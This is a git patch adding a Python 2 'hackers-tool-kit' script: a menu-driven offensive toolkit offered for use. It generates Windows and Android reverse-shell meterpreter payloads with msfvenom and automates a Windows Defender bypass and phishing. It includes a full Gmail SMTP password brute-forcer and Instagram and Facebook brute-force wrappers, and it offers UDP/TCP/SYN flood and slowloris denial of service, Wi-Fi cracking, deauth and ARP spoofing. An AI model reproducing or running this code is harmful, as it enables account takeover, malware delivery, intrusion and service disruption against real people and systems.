os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - -#ABOUT ME / THE CREATOR START# -#----------------------------# -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -#--------------------------# -#ABOUT ME / THE CREATOR END# - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 0aca14fdfaa00699a2a7eab073278f7a6ac80743 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 8 May 2019 00:49:41 +0100 Subject: [PATCH 096/214] Add files via upload --- htk.py | 2623 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2623 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..93cfc6f --- /dev/null +++ b/htk.py @@ -0,0 +1,2623 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + """.decode('utf-8') +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,4) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print 